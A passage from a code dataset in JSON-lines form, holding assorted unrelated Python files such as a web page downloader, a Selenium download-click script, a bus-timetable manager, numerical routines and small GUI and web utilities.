to filepath\n\ndef html_rip(targeturl, filepath):\n with urllib.request.urlopen(targeturl) as response:\n html = str(response.read())\n tempfile = open(filepath, \"w\")\n tempfile.write(html)\n tempfile.close\n\n\n# Specify the target domain\n\nhtml_rip(input(\"Whats the complete url of the target? \"), input(\"What's the absolute path of the filepath you want to create? \"))\n","sub_path":"network-survival-tool-master/ClientBrowser.py","file_name":"ClientBrowser.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"183593803","text":"import os\nimport pyperclip\n\npyperclip.copy('Err')\ntabs = 0\ntabPath = \"\"\ntabsmod = 0\ntabsPlus = 0\nrootDir = \"D:/\"\nsaveFile = r\"C:\\Users\\Sharvin\\Desktop\"\nmasterFilePath = os.path.join(saveFile, '__myList.txt')\nwith open(masterFilePath, 'w', encoding='utf-8') as f:\n for dirpaths, dirnames, filenames in os.walk(rootDir):\n\n _, root = os.path.split(dirpaths)\n\n if root == \"\":\n tabs = 0\n else:\n tabPath = dirpaths.replace('E:/', '')\n tabs = len(tabPath.split('\\\\'))\n tabsmod = tabs - 1\n tabsPlus = tabsmod + 1\n\n if tabsmod == 0:\n f.write('\\n')\n\n f.write('\\t' * tabsmod + root + '\\n')\n\n if tabs == 0 and root == \"\":\n for file in filenames:\n f.write('\\t' * tabs + file + '\\n')\n else:\n for file in filenames:\n f.write('\\t' * tabsPlus + file + '\\n')\n\nwith open(masterFilePath, 'r', encoding='utf-8') as f:\n copiedText = f.read()\n pyperclip.copy(copiedText)\n\nprint('='.center(40, '='))\nprint('COMPLETED'.center(40, '='))\nprint('='.center(40, '='))","sub_path":"ListFolderContent_MODIFIED_append_to_file_in_desktop.py","file_name":"ListFolderContent_MODIFIED_append_to_file_in_desktop.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"353194300","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n@File : selenium_test.py\n@Author: Eveline Xue\n@Date : 2019/4/28 13:50\n@Desc : 使用selenium自动化测试工具模拟浏览器点击\n'''\nimport random\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom referer_proxy import dynamic_load\nfrom utils.useragents import useragent\n\nEXECUTE_PATH = r'E:\\Codes\\xuecode\\handsomeboy\\chromeDriver\\chromedriver74.exe'\n\n\n# 90\ndef search(query_url):\n browser, wait = dynamic_load()\n browser.get(query_url)\n browser.implicitly_wait(10)\n try:\n wait.until(\n EC.presence_of_all_elements_located((By.LINK_TEXT, '普通下载'))\n )\n submit = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"go\"]/a[4]/span')))\n except:\n submit = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"tt_6\"]/a[1]')))\n submit.click()\n time.sleep(20)\n print('click over')\n # url = 'https://httpbin.org/headers'\n # browser.execute_script('window.location.href = \"{}\";'.format(url))\n # wait.until(lambda driver: driver.current_url == url)\n # # print(browser.page_source)\n browser.quit()\n\n\ndef get_exploer():\n # 加表头\n options = webdriver.ChromeOptions()\n options.add_argument(\n 'user-agent={}'.format(random.choice(useragent)))\n browser = webdriver.Chrome(executable_path=EXECUTE_PATH, options=options)\n wait = WebDriverWait(browser, 10)\n return browser, wait\n\n\ndef main():\n search('http://www.90pan.com/b1173540')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"code/selenium_test.py","file_name":"selenium_test.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"595153280","text":"import inspect\nfrom flask import abort\n\n\n__all__ = ['validate']\n\n\ndef validate(*__validators__):\n for __validator__ in __validators__:\n if not inspect.isclass(__validator__):\n raise TypeError('The validate decorator only accepts class.')\n method = getattr(__validator__, 'validate', None)\n if method is None or not callable(method):\n raise AttributeError('The validator should contains a callable method \"validate(self)\"')\n\n def decorator(func):\n\n def func_wrapper(*args, **kwargs):\n for __validator__ in __validators__:\n if not __validator__().validate():\n abort(400)\n return func(*args, **kwargs)\n\n return func_wrapper\n\n return decorator\n","sub_path":"flask_validate/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"621690059","text":"import sys\n\ndef main():\n\tfor line in sys.stdin:\n\t\t\n\t\tinput = [int(num) for num in line.split()]\n\t\t\n\t\ta=input[0]\n\t\tb=input[1]\n\t\tc=input[2]\n\t\t\n\t\tdiscriminant = getDiscriminant(a, b, c)\n\t\tif discriminant < 0:\n\t\t\tprint (\"None\")\n\t\t\tcontinue\n\t\t\n\t\troots = []\n\t\troots.append(((-b)+((discriminant)**0.5))/(2*a))\n\t\troots.append(((-b)-((discriminant)**0.5))/(2*a))\n\t\t\n\t\tprint (\"r1 = {}, r2 = {}\".format(roots[0], roots[1]))\n\t\t\t\ndef getDiscriminant(a, b, c):\n\treturn (b**2) - (4*a*c)\n\t\nif __name__ == \"__main__\":\n\tmain()","sub_path":"62/roots_62.py","file_name":"roots_62.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"548064377","text":"from numpy import *\nfrom time import time\n# 二乗誤差 (a : 真の行列, b : 近似行列)\ndef difcost(a,b):\n\tdif = 0\n\tfor i in range(shape(a)[0]):\n\t\tfor j in range(shape(a)[1]):\n\t\t\tdif += pow(a[i,j]-b[i,j],2)\n\treturn dif\n\n# v : 分解対象の行列 , pc : 特徴の数 , iter : 実行回数\ndef factorize(v,pc=10,t = 20,eps=1e-12):\n\tic = shape(v)[0] # 重み行列の行数(データ項目数)\n\tfc = shape(v)[1] # 特徴行列の列数(特徴項目数)\n\n\t#初期化\n\tw = matrix([[random.random() for i in range(pc)] for j in range(ic)]) \n\th = matrix([[random.random() for i in range(fc)] for j in range(pc)])\n\n\tstart = time()\n\twhile True:\n\t\twh = w*h\n\t\tcost = difcost(v,wh)\n\t\t#print(cost)\n\t\tnow = time()\n\t\tif (now - start) > t or cost < eps:\n\t\t\tbreak\n\t\t# 特徴行列の更新\n\t\thn = (transpose(w)*v)\n\t\thd = (transpose(w)*w*h)\n\t\th = matrix(array(h)*array(hn)/array(hd))\n\n\t\t# 重み行列の更新\n\t\twn = (v*transpose(h))\n\t\twd = (w*h*transpose(h))\n\n\t\tw = matrix(array(w)*array(wn)/array(wd))\n\n\treturn w,h\n\n#テスト実行\n\n\n\n\n\n\n","sub_path":"nmf.py","file_name":"nmf.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"620662464","text":"import sys\nsys.path.append('.')\n\nimport os\nimport argparse\nimport math\nimport numpy as np\nfrom skimage import io, filters, util\nimport json\nfrom tqdm import tqdm\nfrom util import interpolate\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Applies blur with random sigma to images and saves the amount to pose file.')\n parser.add_argument('path_in', help='Path to NeRF dataset.')\n parser.add_argument('path_out', help='Path to save to.')\n parser.add_argument('--subsets', nargs='+', default=['train'], help='Subsets to process.')\n parser.add_argument('--max_sigma', type=float, default=0, help='Max sigma value.')\n parser.add_argument('--dataset_size_increase', type=int, default=1, help='Integer factor by which to increase the dataset.')\n parser.add_argument('--p', type=float, default=3, help='Exponent stearing the sigma distribution.')\n args = parser.parse_args()\n\n # Create output dir\n os.makedirs(args.path_out)\n\n # Loop over images\n for subset in args.subsets:\n print('Processing {} subset.'.format(subset))\n\n # Get image filenames\n imgs_path = os.path.join(args.path_in, subset)\n img_names = sorted(os.listdir(imgs_path))\n n_imgs = len(img_names)\n n_imgs_out = n_imgs * args.dataset_size_increase\n\n # Get pose file path\n path_pose = os.path.join(args.path_in, 'transforms_' + subset + '.json')\n with open(path_pose) as pose_file:\n pose_dict = json.load(pose_file)\n\n # Get image output file path\n path_out_subset = os.path.join(args.path_out, subset)\n os.makedirs(path_out_subset)\n\n # Inverse cdf of exponential distribution for sampling\n def inv_cdf(x, p):\n if -1e-4 < p and p < 1e-4:\n return x\n else:\n return -np.log(1 - x * (1 - np.exp(-p))) / p\n\n # Sample random sigma values\n np.random.seed(0)\n p = 3\n samples = inv_cdf(np.random.rand(n_imgs_out), p)\n sigma = (samples * args.max_sigma).tolist()\n\n # Get format string for image names\n min_chars = math.ceil(np.log10(n_imgs_out))\n format_str = '{:0' + str(min_chars) + 'd}'\n\n # Define map\n def blur_img(inp):\n idx, img_name, sigma = inp\n format = os.path.splitext(img_name)[-1]\n\n if format == '.png':\n # Load image\n img = io.imread(os.path.join(imgs_path, img_name))\n img = util.img_as_float(img)\n img[:,:,:3] = (img[:,:,:3] ** 2.2 * (img[:,:,3:]))\n img = filters.gaussian(img, sigma=sigma, mode='constant', multichannel=True)\n img[:,:,:3] = (img[:,:,:3] / (img[:,:,3:] + 1e-5)) ** (1 / 2.2)\n\n # Save image\n img_prefix = img_name.split('_')[0]\n img_name_out = img_prefix + '_' + format_str.format(idx) + '.png'\n\n io.imsave(os.path.join(path_out_subset, img_name_out), util.img_as_ubyte(np.clip(img,0,1)), check_contrast=False)\n elif format == '.exr':\n import pyexr as exr\n\n # Load image\n img = exr.read(os.path.join(imgs_path, img_name))\n\n # Apply blur\n img = interpolate.filtered_downsample(img, 1, sigma).numpy()\n\n # Save image\n img_prefix = img_name.split('_')[0]\n img_name_out = img_prefix + '_' + format_str.format(idx) + '.exr'\n\n exr.write(os.path.join(path_out_subset, img_name_out), img)\n else:\n raise ValueError('Unknown filetype.')\n\n with tqdm(total=n_imgs_out) as pbar:\n for inp in zip(range(n_imgs_out), img_names * args.dataset_size_increase, sigma):\n blur_img(inp)\n pbar.update()\n\n # Get output pose dict\n pose_dict_out = {}\n pose_dict_out.update({'camera_angle_x': pose_dict['camera_angle_x'], 'frames': []})\n\n # Add sigma values to pose dict\n for i in range(n_imgs_out):\n pose_dict_out['frames'].append(dict(pose_dict['frames'][i % n_imgs]))\n\n img_path = pose_dict_out['frames'][i]['file_path'].split('_')[0]\n img_path_out = img_path + '_' + format_str.format(i)\n pose_dict_out['frames'][i]['file_path'] = img_path_out\n\n updated_parameters = {'Blur': sigma[i]}\n updated_parameters.update(pose_dict_out['frames'][i]['driver_parameters'])\n pose_dict_out['frames'][i]['driver_parameters'] = updated_parameters\n\n # Save pose dict to new location\n path_out_pose = os.path.join(args.path_out, 'transforms_' + subset + '.json')\n with open(path_out_pose, 'w+') as pose_file:\n json.dump(pose_dict_out, pose_file, sort_keys=False, indent=4)","sub_path":"data/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"246801716","text":"#! /usr/bin/python\n# -*- coding:utf-8 -*-\n'''\nPour utiliser le gestionnaire décommentez les lignes de test\nrepéré avec #ligne de test\n'''\n\nimport os\nimport Data, time, random\nfrom time import localtime, strftime\nfrom datetime import datetime\n\nclass Ligne(object):\n '''Objet contenant une ligne qui sera instancier plusieurs fois'''\n def __init__(self, ligne):\n self.num_ligne = ligne\n self.villes_aller = self.init_ville(self.num_ligne, 'aller')\n self.villes_retour = self.init_ville(self.num_ligne, 'retour')\n self.aller = Data.lignes[ligne]['aller']\n self.retour = Data.lignes[ligne]['retour']\n self.ligne = Data.lignes[ligne]\n\n def init_ville(self, num_ligne, Sens):\n '''Initialise la liste des villes'''\n villes = []\n periode = ['scol', 'vac_ete', 'autres_vac']\n\n for sens in Data.lignes[num_ligne]:\n if sens == Sens:\n for row in Data.lignes[num_ligne][sens]:\n for i in range(len(row)):\n if row[i][0] not in villes and row[i][0] not in periode:\n villes.append(row[i][0])\n\n return villes\n\nclass Insert(object):\n '''Objet d'insertion dans la BD'''\n def __init__(self):\n self.dossier = os.listdir('sources')\n\n def lecture_fichier(self, path):\n '''Lit un csv ou un txt et le renvoi sous forme de tableau.'''\n \"\"\"Ouvre et lit un fichier\"\"\"\n with open(path, 'r') as fichier:\n read_fichier = fichier.read()\n\n tab_fichier = []\n saut_de_ligne = True\n\n \"\"\"Insert le contenue du fichier dans tableau Séparateur: saut de ligne\"\"\"\n while saut_de_ligne:\n if '\\n' in read_fichier:\n index = read_fichier.index('\\n')\n tab_fichier.append([read_fichier[:index]])\n read_fichier = read_fichier[index+1:]\n else:\n saut_de_ligne = False\n\n \"\"\"Découpe chaque ligne du tableau. Séparateur: ; \"\"\"\n for j in range(len(tab_fichier)):\n ligne_tab = ';'.join(tab_fichier[j])\n ligne_tab = ligne_tab.split(';')\n tab_fichier[j] = ligne_tab\n\n return tab_fichier\n\n def suppr_inutile(self, tableau):\n '''Supprime les colonnes inutile (contenant ND)'''\n index = None\n IsND = True\n while IsND:\n if 'ND' not in tableau[0]:\n IsND = False\n break\n for row in tableau:\n if len(row) == len(tableau[0]) and len(row) <= 8:\n break\n if row == tableau[0] and 'ND' in row:\n index = tableau[0].index('ND')\n tableau[0].pop(index)\n else:\n row.pop(index)\n return tableau\n\n def inscription(self, lignes, dico_lignes):\n '''Inscrit les données dans la BD'''\n nonInscrit = True\n while nonInscrit:\n try:\n with open('Data.py', 'a') as bd:\n bd.write(lignes)\n bd.write(dico_lignes)\n nonInscrit = False\n except NameError:\n print('Echec de lecture du fichier : '+NameError)\n continue\n\n def insert(self):\n '''Insert les données du dossier \"sources\" dans la BD'''\n lignes = []\n dico_lignes = [\"lignes = {\\n\"]\n\n \"\"\"Liste les sous dossier de /sources\"\"\"\n for i in range(len(self.dossier)):\n paths = []\n path_dossier = 'sources/' + self.dossier[i]\n fichier = os.listdir(path_dossier)\n\n \"\"\"Liste les fichiers contenus dans chaque sous dossier\"\"\"\n for j in range(len(fichier)):\n path_fichier = path_dossier + '/' + fichier[j]\n paths.append(path_fichier)\n\n dico_bd = []\n for path in paths:\n '''\n Créer de trois tableaux pour chaque \"catégories\"\n scol = periode scolaire...\n '''\n fichier = self.lecture_fichier(path)\n\n scol = [fichier[1]] + fichier[4:]\n scol = self.suppr_inutile(scol)\n\n fichier = self.lecture_fichier(path)\n\n vac_ete = [fichier[2]] + fichier[4:]\n vac_ete = self.suppr_inutile(vac_ete)\n\n fichier = self.lecture_fichier(path)\n\n autre_vac = [fichier[3]] + fichier[4:]\n autre_vac = self.suppr_inutile(autre_vac)\n\n if dico_bd == []:\n dico_bd.append(fichier[0][0])\n dico_bd.append(fichier[0][1])\n dico_bd.append(fichier[0][2])\n\n else:\n dico_bd.append(fichier[0][2])\n\n '''inscrit les tableaux dans une var'''\n lignes.append(fichier[0][2]+' = [\\n'+str(scol)+',\\n'+str(autre_vac)+',\\n'+str(vac_ete)+']\\n')\n\n if i == len(self.dossier)-1:\n dico_lignes.append(\" '\"+dico_bd[1]+\"': {'aller': \"+dico_bd[2]+\", 'retour': \"+dico_bd[3]+\"}\\n}\")\n else:\n dico_lignes.append(\" '\"+dico_bd[1]+\"': {'aller': \"+dico_bd[2]+\", 'retour': \"+dico_bd[3]+\"},\\n\")\n lignes = ''.join(lignes)\n dico_lignes = ''.join(dico_lignes)\n self.inscription(lignes, dico_lignes)\n\nclass Temps(object):\n '''Objet de gestion de la date et de l'heure '''\n def __init__(self):\n self.date = self.init_date()\n self.heure = self.init_heure()\n self.numJourAn = self.init_numjouran()\n self.numJourSem = self.init_numjoursem()\n self.jour_feries = ['15/8/2015','1/11/2015','11/11/2015','25/12/2015','1/1/2016','28/3/2016','1/5/2016','5/5/2016','16/5/2016','14/7/2016']\n self.jour = self.init_jour()\n self.vacances = {'vac_ete': ['5/07/2015', '1/09/2015'], 'toussaint': ['17/10/2015', '2/11/2015'], 'noel': ['19/12/2015', '4/01/2016'], 'hiver': ['13/02/2016', '29/02/2016'], 'printemps': ['9/04/2016', '25/04/2016']}\n self.periode = self.init_periode()\n\n def init_date(self):\n '''Mise en forme de la date'''\n objet_date = datetime.now()\n if len(str(objet_date.month)) == 1:\n mois = '0' + str(objet_date.month)\n else:\n mois = str(objet_date.month)\n date = str(objet_date.day)+'/'+mois+'/'+str(objet_date.year)\n return date\n\n def init_heure(self):\n '''Initialisation de l'heure'''\n heure = strftime(\"%H:%M\", localtime())\n heure = heure.split(':')\n heure = int(str(heure[0])+str(heure[1]))\n return heure\n\n def init_numjouran(self):\n '''Donne le numéro du jour dans l'année'''\n date = self.date.split('/')\n jour, mois, annee = date\n jour, mois, annee = int(jour), int(mois), int(annee)\n if ((annee % 4 == 0 and annee % 100 != 0) or annee % 400 == 0): # bissextile?\n return (0,31,60,91,121,152,182,213,244,274,305,335,366)[mois-1] + jour\n else:\n return (0,31,59,90,120,151,181,212,243,273,304,334,365)[mois-1] + jour\n\n def init_numjoursem(self):\n '''Donne le numéro du jour de la semaine'''\n date = self.date.split('/')\n annee = int(date[2])-1\n jour = (annee+(annee//4)-(annee//100)+(annee//400)+self.numJourAn) % 7\n if jour == 0: jour = 7\n return jour\n\n def init_jour(self):\n if self.date in self.jour_feries:\n return 'Ferie'\n return ['Lundi', 'Mardi', 'mercredi', 'Jeudi', 'Vendredi', 'Samedi', 'Dimanche'][self.numJourSem-1]\n\n def date_anterieur(self, premiere_date, seconde_date):\n '''Dit si une premiere date est antèrieure ou égale à une seconde date'''\n premiere_date = premiere_date.split('/')\n seconde_date = seconde_date.split('/')\n if premiere_date == seconde_date:\n return 'identique'\n else:\n if int(seconde_date[2]) > int(premiere_date[2]):\n return True\n elif int(seconde_date[2]) == int(premiere_date[2]):\n if int(seconde_date[1]) > int(premiere_date[1]):\n return True\n elif int(seconde_date[1]) == int(premiere_date[1]):\n if int(seconde_date[0]) >= int(premiere_date[0]):\n return True\n return False\n\n def date_posterieur(self, premiere_date, seconde_date):\n '''Dit si une premiere date est postérieure ou égale à une seconde date'''\n premiere_date = premiere_date.split('/')\n seconde_date = seconde_date.split('/')\n if premiere_date == seconde_date:\n return 'identique'\n else:\n if int(seconde_date[2]) < int(premiere_date[2]):\n return True\n elif int(seconde_date[2]) == int(premiere_date[2]):\n if int(seconde_date[1]) < int(premiere_date[1]):\n return True\n elif int(seconde_date[1]) == int(premiere_date[1]):\n if int(seconde_date[0]) <= int(premiere_date[0]):\n return True\n return False\n\n def init_periode(self):\n '''Initialise la période de l'année'''\n for vacance in self.vacances:\n posterieur = self.date_posterieur(self.date, self.vacances[vacance][0])\n anterieur = self.date_anterieur(self.date, self.vacances[vacance][1])\n\n if posterieur == True and anterieur == True:\n if vacance == 'vac_ete':\n retour = 2\n break\n else:\n retour = 1\n break\n elif posterieur == False or anterieur == False:\n retour = 0\n return retour\n\nclass Select(object):\n ''''Objet selection des horaires'''\n def __init__(self, ville_depart, arret_depart, ville_arriver, arret_arriver):\n self.lignes = self.init_lignes()\n self.ville_depart = ville_depart\n self.arret_depart = arret_depart\n self.ville_arriver = ville_arriver\n self.arret_arriver = arret_arriver\n self.date = Temps()\n self.num_ligne = self.init_num_ligne()\n self.sens = self.init_sens()\n self.fiche = self.init_fiche()\n self.index_jour =self.init_index_jour()\n self.index_heure = None\n self.depart, self.arriver = self.init_depart_arriver()\n self.depart = self.select_arret(self.depart)\n self.arriver = self.select_arret(self.arriver)\n self.depart = self.select_horaire(self.depart)\n self.arriver = self.select_horaire(self.arriver)\n self.retour = self.mise_en_forme(self.depart, self.arriver)\n\n def init_lignes(self):\n '''Initialise le dictionnaire contenant les objets ligne'''\n lignes = {}\n for num_ligne in Data.lignes:\n lignes[str(num_ligne)] = Ligne(num_ligne)\n return lignes\n\n def init_num_ligne(self):\n '''Détermine le numéro de la ligne'''\n for ligne in self.lignes:\n if self.ville_depart in self.lignes[ligne].villes_aller and self.ville_arriver in self.lignes[ligne].villes_aller:\n return ligne\n\n def init_sens(self):\n '''Détermine le sens grace à la position des villes dans la liste'''\n if self.lignes[self.num_ligne].villes_aller.index(self.ville_depart) < self.lignes[self.num_ligne].villes_aller.index(self.ville_arriver):\n return 'aller'\n else:\n return 'retour'\n\n def init_fiche(self):\n '''Renvoi la fiche voule grace au sens'''\n if self.sens == 'aller': return self.lignes[self.num_ligne].aller[self.date.periode]\n elif self.sens == 'retour': return self.lignes[self.num_ligne].retour[self.date.periode]\n\n def init_index_jour(self):\n '''Détermine l'index des colonnes voulue (jour) pour selectionner les bons horaires'''\n index_jour = []\n aujourdhui = self.date.jour\n aujourdhui = aujourdhui[0]\n for jour in self.fiche[0]:\n if jour != self.fiche[0][0] and jour != self.fiche[0][1]:\n if aujourdhui in jour:\n index_jour.append(self.fiche[0].index(jour))\n index_jour.reverse()\n index_jour.append(1)\n index_jour.append(0)\n index_jour.reverse()\n return index_jour\n\n def init_depart_arriver(self):\n '''Sélectionne les lignes contenant les villes de depart et d'arriver'''\n depart = []\n arriver = []\n for horaire in self.fiche:\n buffer_depart = []\n buffer_arriver = []\n if horaire[0] == self.ville_depart:\n if horaire[:3] == ['LE CHEYLARD', 'Collège St Louis', '0']:continue\n for index in self.index_jour:\n buffer_depart.append(horaire[index])\n elif horaire[0] == self.ville_arriver:\n for index in self.index_jour:\n buffer_arriver.append(horaire[index])\n if buffer_arriver != []:\n arriver.append(buffer_arriver)\n if buffer_depart != []:\n depart.append(buffer_depart)\n self.index_heure = self.init_index_heure(depart)\n return depart, arriver\n\n def init_index_heure(self, depart):\n '''Détermine l'index des colonnes voulue (heure) pour selectionner les bons horaires'''\n index_heure = []\n for DepArr in depart:\n if depart.index(DepArr) == 1: break\n for heure in DepArr:\n print(heure)\n try:\n decoupe = heure.split(':')\n decoupe = int(str(decoupe[0])+str(decoupe[1]))\n if decoupe > self.date.heure:\n if str(DepArr.index(heure)) not in index_heure:\n index_heure.append(DepArr.index(heure))\n except:\n index_heure.append(DepArr.index(heure))\n return index_heure\n\n def select_arret(self, ligne):\n if ligne[0][0] == self.ville_depart:\n tab_retour = []\n for arret in ligne:\n if self.arret_depart == arret[1]:\n tab_retour = arret\n break\n else:\n continue\n return tab_retour\n else:\n tab_retour = []\n for arret in ligne:\n if self.arret_arriver == arret[1]:\n tab_retour = arret\n else:\n continue\n return tab_retour\n\n def select_horaire(self, arret):\n '''Renvoi la ville, l'arret et les horaire en fonction des index des heures voulue'''\n tab_retour = []\n for heure in arret:\n if arret.index(heure) in self.index_heure:\n tab_retour.append(heure)\n else:\n continue\n return tab_retour\n\n def mise_en_forme(self, depart, arriver):\n '''Met en forme le dictionnaire de retour'''\n dico_retour = {}\n '''Met en forme le départ'''\n dico_retour[self.ville_depart] = {}\n depart = depart[1:]\n for i in range(len(depart)):\n if i == 0:continue\n dico_retour[self.ville_depart]['bus'+str(i)] = [depart[0], depart[i]]\n\n '''Met en forme l'arriver'''\n dico_retour[self.ville_arriver] = {}\n arriver = arriver[1:]\n for i in range(len(arriver)):\n if i == 0:continue\n dico_retour[self.ville_arriver]['bus'+str(i)] = [arriver[0], arriver[i]]\n\n return dico_retour\n\n################################################\n'''Section fonctions app'''\n\ndef select_villes(lettre_choisi):\n '''Recupère la liste des villes et la renvoi sous forme de tableau'''\n villes_aller = []\n periode = ['scol', 'vac_ete', 'autres_vac']\n for ligne in Data.lignes:\n for sens in Data.lignes[ligne]:\n if sens == 'aller':\n for row in Data.lignes[ligne][sens]:\n for i in range(len(row)):\n if row[i][0] not in villes_aller and row[i][0] not in periode:\n if row[i][0][0] == lettre_choisi:\n villes_aller.append(row[i][0])\n\n villes_aller.sort()\n return villes_aller\n\ndef select_arrets(ville_selectionne):\n periode = ['scol', 'vac_ete', 'autres_vac']\n arrets = []\n for ligne in Data.lignes:\n for sens in Data.lignes[ligne]:\n if sens == 'aller':\n for row in Data.lignes[ligne][sens]:\n for i in range(len(row)):\n if row[i][0] not in arrets and row[i][0] not in periode:\n if row[i][0] == ville_selectionne and row[i][1] not in arrets:\n arrets.append(row[i][1])\n arrets_retour = arrets\n arrets_retour.sort()\n return arrets_retour\n\ndef select_seconde_villes(ville_selectionne, lettre_choisi):\n '''Recupère la liste des villes et la renvoi sous forme de tableau'''\n periode = ['scol', 'vac_ete', 'autres_vac']\n\n villes = []\n for ligne in Data.lignes:\n for sens in Data.lignes[ligne]:\n if sens == 'aller':\n for row in Data.lignes[ligne][sens]:\n for i in range(len(row)):\n if row[i][0] not in villes and row[i][0] not in periode:\n if row[i][0][0] == lettre_choisi and row[i][0] != ville_selectionne:\n villes.append(row[i][0])\n villes_retour = villes\n villes_retour.sort()\n return villes_retour\n\ndef select_horaire(depart, arret_depart, arriver, arret_arriver):\n '''\n Le select général\n Les valeurs demandées sont sous cette forme:\n depart = 'LE CHEYLARD'\n arriver = 'CHARMES'\n '''\n if depart != None or arriver != None:\n selection = Select(depart, arret_depart, arriver, arret_arriver)\n return selection.retour\n else:\n return 'ERREUR'\n\n################################################\n\nif __name__ == '__main__':#lignes de test\n #print('1-select 2-insert')\n #choix = input()\n choix = '1'\n if choix == '1':\n print(select_horaire('LE CHEYLARD', 'Gendarmerie', 'CHARMES', 'Centre'))\n #test_select = Select('LE CHEYLARD', 'CHARMES')\n #for row in test_select.retour: print(row, test_select.retour[row])\n #for row in test_select.depart: print(row)\n #for row in test_select.arriver: print(row)\n\n #main()\n elif choix == '2':\n insertion = Insert()\n insertion.insert()","sub_path":".buildozer/android/app/gestion_bd.py","file_name":"gestion_bd.py","file_ext":"py","file_size_in_byte":18693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342787510","text":"class Solution:\n def numDistinct_simple(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: int\n \"\"\"\n dp = [1] + [0] * (len(t))\n for c in s:\n for i in range(len(t) - 1, -1, -1):\n if c == t[i]:\n dp[i + 1] += dp[i]\n print(dp)\n return dp[-1]\n\n def numDistinct(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: int\n \"\"\"\n n, m = len(s), len(t)\n dp = [[0] * (n+1) for _ in range(m+1)]\n dp[0][0] = 1\n # All i can create the empty target sequence, just skip everything\n for i in range(n+1):\n dp[0][i] = 1\n\n for i in range(1, m+1):\n for j in range(1, n+1):\n if s[j-1] != t[i-1]:\n dp[i][j] = dp[i][j-1]\n else:\n dp[i][j] = dp[i][j-1] + dp[i-1][j-1]\n print(dp[i])\n return dp[m][n]\n\nsol = Solution()\nprint(sol.numDistinct(\"rabbbit\", \"rabbit\"))\n# print(sol.numDistinct(\"rabbb\", \"rabb\"))\n","sub_path":"distinct_strs.py","file_name":"distinct_strs.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"383906471","text":"import com.ihsan.foundation.pobjecthelper as phelper\nimport sys\n\ndef TampilNama(config, parameter, returnpacket):\n status = returnpacket.CreateValues(\n ['IsErr',0],\n ['ErrMessage',''],\n ['NamaBeasiswa',''],\n ['PhoneNumber',''],\n ['alamat',''],\n ['kota',''],\n ['kodepos',''],\n )\n try:\n param = parameter.FirstRecord\n helper = phelper.PObjectHelper(config)\n\n oCust = helper.GetObject('Mustahiq', param.idmustahiq)\n oBeasiswa = helper.GetObject('Customer', oCust.CustomerId)\n\n status.NamaBeasiswa = oBeasiswa.CustomerName\n status.PhoneNumber = oBeasiswa.PhoneNumber\n status.alamat = oBeasiswa.AddressStreet\n status.kota = oBeasiswa.AddressCity\n status.kodepos = oBeasiswa.AddressPostalCode\n\n except:\n status.IsErr = 1\n status.ErrMessage = str(sys.exc_info()[1])\n raise\n\ndef Simpan(config, parameter, returns):\n status = returns.CreateValues(\n ['Is_Err',0],['Err_Message',''],['Pesan','']\n )\n recParam = parameter.FirstRecord\n helper = phelper.PObjectHelper(config)\n ProductId = recParam.ProductId\n config.BeginTransaction()\n param = {'tipe':'Beasiswa'}\n try:\n\n assProd = helper.CreatePObject('MustahiqProduct', param)\n assProd.ProductId = ProductId\n assProd.MustahiqId = recParam.GetFieldByName('LMustahiqProduct.MustahiqId')\n\n UpdateProduk = helper.GetObject('Product',ProductId )\n SisaQuota = UpdateProduk.CurrentQuotaPosition + 1\n UpdateProduk.CurrentQuotaPosition = SisaQuota\n if SisaQuota >= UpdateProduk.MustahiqQuota :\n UpdateProduk.IsQuotaFull = 'T'\n\n config.Commit()\n status.Pesan='Data Beasiswa Berhasil diregistrasi..'\n except:\n config.Rollback()\n status.Is_Err = 1\n status.Err_Message = str(sys.exc_info()[1])\n raise\n\n","sub_path":"dialogs/Beasiswa/fAddDataBeasiswaNasabah_data.py","file_name":"fAddDataBeasiswaNasabah_data.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"102967698","text":"\nfrom tkinter import *\n\n\nclass Application(Frame):\n \"\"\"GUI app with 3 buttons\"\"\"\n\n def __init__(self, master) :\n \"\"\"\"init the frame\"\"\"\n Frame.__init__(self,master)\n self.grid()\n self.create_widgets()\n\n def create_widgets (self):\n \"\"\"create 3 buttons \"\"\"\n #create the game title\n self.title = Label(self, text = \"Majority Rules\\nThe game of guessing what the world thinks\\n\")\n self.title.grid(sticky=N)\n\n self.instruction = Label(self, text = \"Enter a search term:\")\n self.instruction.grid(sticky=N)\n\n self.searchterm = Entry(self)\n self.searchterm.grid()\n \n #googleit button\n self.button1 = Button(self, text = \"Google it.\")\n self.button1.grid()\n\n #randomsearchterm button\n self.button2 = Button(self)\n self.button2.grid()\n self.button2.configure(text = \"I'm feeling lucky!\")\n\n self.QUIT = Button(self, text=\"Quit\", 